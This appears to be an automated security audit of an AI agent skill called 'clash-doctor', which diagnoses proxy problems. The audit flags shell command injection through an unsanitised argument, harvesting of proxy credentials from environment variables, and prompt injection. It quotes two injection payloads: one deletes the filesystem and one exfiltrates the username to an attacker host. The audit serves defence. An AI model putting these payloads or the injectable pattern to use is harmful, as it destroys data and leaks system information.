clash-doctor
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- COMMAND_EXECUTION (HIGH): The skill is vulnerable to shell command injection via the
$ARGUMENTSvariable. - Evidence: The skill takes the target domain from
$ARGUMENTSand assigns it to theTARGETvariable in multiple shell blocks (e.g.,TARGET="$ARGUMENTS"). This variable is then used in commands likenslookup $TARGET,ping -c 3 $TARGET, andcurl ... https://$TARGETwithout any sanitization or escaping. - Impact: An attacker could provide an argument such as
; rm -rf / ;or; curl http://attacker.com/$(whoami) ;to execute arbitrary system commands with the permissions of the agent. - DATA_EXFILTRATION (MEDIUM): The skill performs significant local reconnaissance and environment discovery.
- Evidence:
- Environment Variables: It executes
env | grep -i -E '(proxy|...)', which can expose sensitive credentials if authentication is embedded in proxy URLs (e.g.,http://user:password@proxy). - Git Configuration: It reads global Git configurations (
git config --global --get http.proxy). - Port Scanning: It uses
lsofto scan for listening processes on common proxy ports (7890, 9090, etc.), identifying local services. - System Configuration: It uses
networksetupon macOS to extract detailed network interface and proxy settings. - PROMPT_INJECTION (LOW): The skill allows the user to influence the logic via the target domain argument.
- Evidence: Because the input is ingested into a diagnostic prompt that uses a "judgment matrix," a carefully crafted argument could potentially confuse the agent's logic, though this is primarily a surface for the command injection described above.
Recommendations
- AI detected serious security threats
Audit Metadata